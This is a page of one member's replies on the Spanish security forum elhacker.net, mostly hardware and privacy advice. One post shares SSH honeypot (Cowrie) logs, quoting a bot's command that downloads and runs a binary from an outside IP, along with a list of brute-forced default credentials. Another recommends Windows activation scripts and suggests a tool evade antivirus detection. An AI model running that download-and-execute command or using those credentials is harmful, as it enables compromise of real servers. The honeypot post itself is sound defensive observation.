elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 486
51  Informática / Hardware / Re: No me detecta los discos duros del Packard Bell en: 17 Febrero 2021, 17:08 pm
Citar
En la bios no me lo detecta, me sale "IDE 0:   " sin especificar nada.

Si la BIOS no detecta el disco duro, es que está estropeado. Debería salir el modelo, el fabricante, etc. Prueba en otra BIOS si puedes para asegurar.

Has hecho bien de comprar un adaptador por USB pero si tampoco lo reconoce mal asunto. Aunque tenías más posibilidades que lo detecte la BIOS que por cable USB.

Si hace ruidos mala señal.

Ese disco duro wd5000bpvt 500gb es SATA, no IDE.

Citar
Uno nuevo, cuando valdria?

Depende del tamaño y modelo que quieras, pero compra un SSD, no compres un HDD mecánico.

Ahora están muy bien de precio, puedes tener un disco duro portátil (2,5) SSD de 240GB por 31€ ahora mismo, un Kingston A400 es lo más barato que hay y son rápidos y funcionan bien.

Bajar un Windows 10-7 de un sitio que no sea el oficial es jugársela mucho, te bajas la ISO oficial, y lo activas fácilmente, te aseguras que Windows funcione bien y no le hayan quitado, ni añadido nada.
52  Seguridad Informática / Seguridad / Re: Tails en máquina virtual en: 17 Febrero 2021, 17:01 pm
Citar
¿Sería entonces más recomendable crear un usb con tails o es igual accediendo como anfitrión desde windows?

Supongo que te refieres que tienes dos opciones;

1 Usar Live-CD de Tails al arrancar el PC
2 Virtualizar (en una máquina virtual ejecutar Tails) y el host (anfitrión Windows)

Te recomiendo la segunda opción, es más práctica  e incluso seguro. Eso si, consume algo más de recursos.

Citar
Veo además que virtualbox no te ofrece nativo esa opción de lanzar la virtualización al arranque,
No es necesario, la gracia de virtualizar , es tener dos máquinas en una, si arrancas ya no hay host-guest y no es virtualizar, sólo hay 1 sistema en marcha.

No he probado TAILS pero si he leído sobre ella y he publicado en el blog información sobre ella y a nivel de privacidad y seguridad es bastante recomendable. Aunque vaya puedes instalar Tor en Windows y es casi igual de seguro para según lo que quieras hacer, no hace falta montar una máquina virtual para ello.
53  Seguridad Informática / Seguridad / Re: ¿Que navegador web recomiendan? en: 17 Febrero 2021, 16:54 pm
Si quieres ir un paso más allá en cuanto a seguridad y privacidad puedes probar Brave


Citar
Brave es un navegador web de código abierto basado en Chromium, creado por la compañía Brave Software en el año 2016, fundada por el cofundador del Proyecto Mozilla y creador de javascript, Brendan Eich.​ A partir de 2019, Brave ha sido lanzado para Windows, macOS, Linux, Android e iOS

https://brave.com/es/
54  Foros Generales / Foro Libre / Re: alguien conoce a estos hacker? en: 17 Febrero 2021, 16:51 pm
No tenemos el gusto de conocerlos, pero me juego lo que quieras que no son hackers, sino una pandilla o grupo de niñatos rata que se aburren....

¿Puedes explicar un poco mejor el contexto de todo?

Es decir como hackearon la página web e tu hermano y de tu padre? ¿Y cómo sabes que fueron ellos? ¿Te lo dijeron?

¿El hosting es compartido o un servidor dedicado? ¿WordPress u otro sistema? ¿Tienes copias de seguridad?
55  Comunicaciones / Redes / Re: Alguien podria ayudarme a comprender esto..? en: 17 Febrero 2021, 16:47 pm
¿Sistema operativo? Entiendo que Windows 10.

Que el ordenador se congele al ver un vídeo pueden ser mil cosas, desde un problema de hardware a software, aunque me inclino por hardware siendo Windows 10 funciona bastante bien.

¿El escaner al router lo has hecho internamente (desde la misa red local) o externo, con la ip pública de tu amigo?

No debería tener ningún puerto abierto. ¿Qué modelo de router tiene?

Para "cerrar puertos" del router, primero tienes que saber que servicio está escuchando detráde cada puerto. No entiendo muy bien porque está el puerto 80 abierto si no hay ningún servidor web detrás o o bien hay acceso remoto al panel de control del router desde internet, lo cual es muy, muy mala idea.

Indica el modelo de router o compañía para poder ayudarte mejor.
56  Seguridad Informática / Seguridad / Re: Necesito ayuda! en: 17 Febrero 2021, 16:43 pm
La información que das es muy poco completa para poder ayudarte correctamente.


Citar
Alguien creo un user nuevo, con contraseña y todo en mi pc.


¿Cómo te has dado cuenta de eso?

¿Estamos hablando de Windows 10, Windows 7?

Citar
Anteriormente tuve un problema y creo que me entro un virus. Alguien me da instrucciones para quitarlo?

¿Qué problema fue exactamente? ¿Creo que entró un virus?

¿Usas algún antivirus, Windows Defender o alguna otro?


Si tu pc ya no va funciona, pues necesitas otro ordenador para grabar o guardar la ISO (imagen de Windows) en un pendrive y poder arrancar con él para instalar Windows de 0 (de nuevo)

NO hace falta ni usar Rufus, con la herramienta de Microsoft Media Creation Tool te graba la ISO en el pendrive automáticamente

Media Creation Tool
https://www.microsoft.com/es-es/software-download/windows10
57  Informática / Hardware / Re: Me he cargado una placa AsRock vieja en: 17 Febrero 2021, 16:17 pm
Opino lo miso que Songoku. Arregla fuente de alimentación no vale la pena, compra una de nueva  y fuera problemas. Por el precio que tienen y las actuales son bastante más seguras y eficientes.

@Serapis  - Dañar una placa base por electricidad electrostática nunca lo he visto, pero técnicamente es posible, aunque una putada y nada habitual supongo.

Citar
Podrías haber olvidado conectar correctamente el cable del ventilador (el del procesador de la placa base,etc...),

Totalmente cierto, en las BIOS (UEFI) actuales si no conectas el cable ventilador en CPU_ FAN el ordenador arranca pero se apaga automáticamente para evitar daños en la CPU por calor.

Lógicamente si lo conectas a CHASSIS_FAN u otro conector de 3-4 pines el ventilador funciona, pero la BIOS creo que lo has olvidado de conectar y se apaga por seguridad.

Entiendo oque cambiando la fuente de alimentación lo has podido solucionar o si arranca puedes probar de actualizar, resetear o manejar la BIOS.

Consulta siempre el manual de la placa base por si tiene alguna peculiaridad, porque no hay dos iguales y menos entre distintos fabricantes.

Sobre los condensadores - VRM escribí hace muy poco sobre ellos, y sobre más aspectos de una placa base:

Nomenclatura de la BIOS/UEFI: ErP Ready, CSM, VRM, QVL, XMP
https://blog.elhacker.net/2021/01/nomenclatura-de-la-bios-uefi-erp-ready-CSM-VRM-QVL-XMP.html
58  Seguridad Informática / Bugs y Exploits / Logs interesantes Honeypot SSH (Cowrie) en: 17 Febrero 2021, 16:07 pm
Jugando con los honeypots he visto algunas cosas interesantes, aunque todo son herramientas automatizadas y no ataques de personales "reales", son todo bots.

Pero en log que pongo pues una ip China:
IP China
https://www.elhacker.net/geolocalizacion.html?host=154.223.167.54

Se bajó un binario llamado 80

Citar
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80

binario 80 ELF
https://www.virustotal.com/gui/file/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631/detection

gcc.pid ????
https://www.virustotal.com/gui/file/05b08f11a7073248fb29cfedb0ac4d4e050356b83eeaec8d7bbcd9f25b79fdbb

Top 10 comandos más utilizados:



En otra máquina resulados bastante diferentes:



Adjunto el log

Citar
2021-01-28T18:37:58.692411Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 154.223.167.54:43236 (192.168.0.7:2222) [session: 1f08d81dd680]
2021-01-28T18:37:58.697484Z [HoneyPotSSHTransport,4,154.223.167.54] Remote SSH version: b'SSH-2.0-PUTTY'
2021-01-28T18:37:58.957221Z [HoneyPotSSHTransport,4,154.223.167.54] SSH client hassh fingerprint: 92674389fa1e47a27ddd8d9b63ecd42b
2021-01-28T18:37:58.962131Z [HoneyPotSSHTransport,4,154.223.167.54] kex alg, key alg: b'diffie-hellman-group14-sha1' b'ssh-rsa'
2021-01-28T18:37:58.962417Z [HoneyPotSSHTransport,4,154.223.167.54] outgoing: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:58.962656Z [HoneyPotSSHTransport,4,154.223.167.54] incoming: b'aes128-ctr' b'hmac-sha1' b'none'
2021-01-28T18:37:59.568103Z [HoneyPotSSHTransport,4,154.223.167.54] NEW KEYS
2021-01-28T18:37:59.818998Z [HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-userauth'
2021-01-28T18:38:00.081545Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'none'
2021-01-28T18:38:00.340869Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' trying auth b'password'
2021-01-28T18:38:00.342139Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Could not read etc/userdb.txt, default database activated
2021-01-28T18:38:00.342961Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] login attempt [b'root'/b'mucleus.caca.root'] succeeded
2021-01-28T18:38:00.346823Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] Initialized emulated server as architecture: linux-x64-lsb
2021-01-28T18:38:00.348560Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] b'root' authenticated with b'password'
2021-01-28T18:38:00.349507Z [SSHService b'ssh-userauth' on HoneyPotSSHTransport,4,154.223.167.54] starting service b'ssh-connection'
2021-01-28T18:38:00.603490Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:38:00.604767Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:38:00.950026Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'#!/bin/sh\nPATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nwget http://98.159.111.131/80\ncurl -O http://98.159.111.131/80\nchmod +x 80\n./80\n'"
2021-01-28T18:38:00.952721Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.111.131/80; curl -O http://98.159.111.131/80; chmod +x 80; ./80;
2021-01-28T18:39:01.013363Z [-] exitCode: 1
2021-01-28T18:39:01.013920Z [-] sending request b'exit-status'
2021-01-28T18:39:01.015173Z [-] Closing TTY Log: var/lib/cowrie/tty/419a5f3fde27adba89708285693140846f5cf0e98a43290aa5003d8b4a4252d5 after 60 seconds
2021-01-28T18:39:01.015774Z [-] sending close 0
2021-01-28T18:39:01.519587Z [SSHChannel session (0) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:01.520955Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:01.521879Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:01.774363Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] asking for subsystem "b'sftp'"
2021-01-28T18:39:01.775031Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] {b'sftp': <class 'twisted.conch.ssh.filetransfer.FileTransferServer'>}
2021-01-28T18:39:02.500813Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP openFile: b'/bin/eyshcjdmzg'
2021-01-28T18:39:06.584852Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66161 to 64911 in channel 1
2021-01-28T18:39:10.653511Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:14.733271Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:18.811865Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:22.897300Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:26.974574Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:31.093693Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:35.187235Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:39.297588Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] adding 66112 to 64960 in channel 1
2021-01-28T18:39:43.879794Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] SFTP Uploaded file "eyshcjdmzg" to var/lib/cowrie/downloads/bbbbac8f4a02d21c4643f709e355aa5ed43e98725a5c08742a4b8e295eb6f631
2021-01-28T18:39:44.136949Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 1
2021-01-28T18:39:44.138294Z [SSHChannel session (1) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:44.139275Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:44.140193Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:44.480978Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'/bin/eyshcjdmzg'"
2021-01-28T18:39:44.483424Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: /bin/eyshcjdmzg
2021-01-28T18:39:44.485118Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command not found: /bin/eyshcjdmzg
2021-01-28T18:39:54.752142Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:54.752851Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:54.754609Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/27bfa685b0774a88946b7b3f3d0f6291bcc8e0ae37769309a8d086593862c0d0 after 10 seconds
2021-01-28T18:39:54.759462Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 2
2021-01-28T18:39:55.004309Z [SSHChannel session (2) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:55.296545Z [SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] got channel b'session' request
2021-01-28T18:39:55.297591Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] channel open
2021-01-28T18:39:56.293421Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] executing command "b'ls -la /var/run/gcc.pid'"
2021-01-28T18:39:56.295896Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] CMD: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.297632Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Command found: ls -la /var/run/gcc.pid
2021-01-28T18:39:56.298644Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:56.298941Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending request b'exit-status'
2021-01-28T18:39:56.299253Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] sending close 3
2021-01-28T18:39:57.974393Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] exitCode: 0
2021-01-28T18:39:57.975498Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] Closing TTY Log: var/lib/cowrie/tty/e9ca076a73c58dc3b053e9f3e0249b13f1c1b47d23846405096e8c10dc3f7d26 after 1 seconds
2021-01-28T18:39:57.978774Z [SSHChannel session (3) on SSHService b'ssh-connection' on HoneyPotSSHTransport,4,154.223.167.54] remote close
2021-01-28T18:39:57.979388Z [HoneyPotSSHTransport,4,154.223.167.54] Got remote error, code 11 reason: b''
2021-01-28T18:39:57.980313Z [HoneyPotSSHTransport,4,154.223.167.54] avatar root logging out
2021-01-28T18:39:57.980654Z [HoneyPotSSHTransport,4,154.223.167.54] connection lost
2021-01-28T18:39:57.980912Z [HoneyPotSSHTransport,4,154.223.167.54] Connection lost after 119 seconds

En Twitter y en el blog he publicado algunas de las combinaciones de contraseñas más habituales

Citar
############
Top 20 COWRIE Usernames for 2021-02-11
############
   3288 b'root'|b'password'
    751 b'admin'|b'password'
    727 b'root'|b'none'
    426 b'admin'|b'none'
    252 b'Admin'|b'password'
    140 b'user'|b'password'
    124 b'Admin'|b'none'
    118 b'ubuntu'|b'password'
     96 b'nproc'|b'password'
     91 b'test'|b'password'
     80 b'postgres'|b'password'
     46 b'nagios'|b'password'
     42 b'oracle'|b'password'
     39 b'guest'|b'password'
     38 b'support'|b'password'
     38 b'Administrator'|b'password'
     30 b'git'|b'password'
     28 b'deploy'|b'password'
     24 b'ftpuser'|b'password'
     22 b'user'|b'none'



En otra ip resultados no exactamente iguales:


Y algunos gráficos completos (país, etc)

Citar
1- Irlanda
2- Rusia
3- Panamá

688 ip's diferentes en apenas 9 horas
59  Informática / Software / Re: Windows 10 Tool - Activacion de Windows 10 y Office en: 17 Febrero 2021, 15:38 pm
Deberías crear una herramienta que no la detecten los antivirus o la acabará usando muy poca gente por miedo.

Por ejemplo supongo que ya debes conocer la herramienta:
https://github.com/massgravel/Microsoft-Activation-Scripts

Es una de las más transparentes, fáciles y sencillas de utilizar, y sin detección antivirus.

Porque todas o casi todas están basadas siempre en los mismos......

Activación de Windows 10 y diferencias entre versión Home y Professional
https://blog.elhacker.net/2020/11/activar-windows-10-licencia-digital-diferencias-entre-windows-10-home-y-professional-saber-version-build-instalada.html
60  Seguridad Informática / Hacking Ético / Re: ROMPER HASH MSSQL Y FTP en: 17 Febrero 2021, 15:31 pm
Lo primero que tienes que hacer es identificar el tipo de hash que quieres crackear.

Esto lo puedes hacer o bien sabiendo de dónde lo has obtenido o bien analizarlo con alguna herramienta.
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 486
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines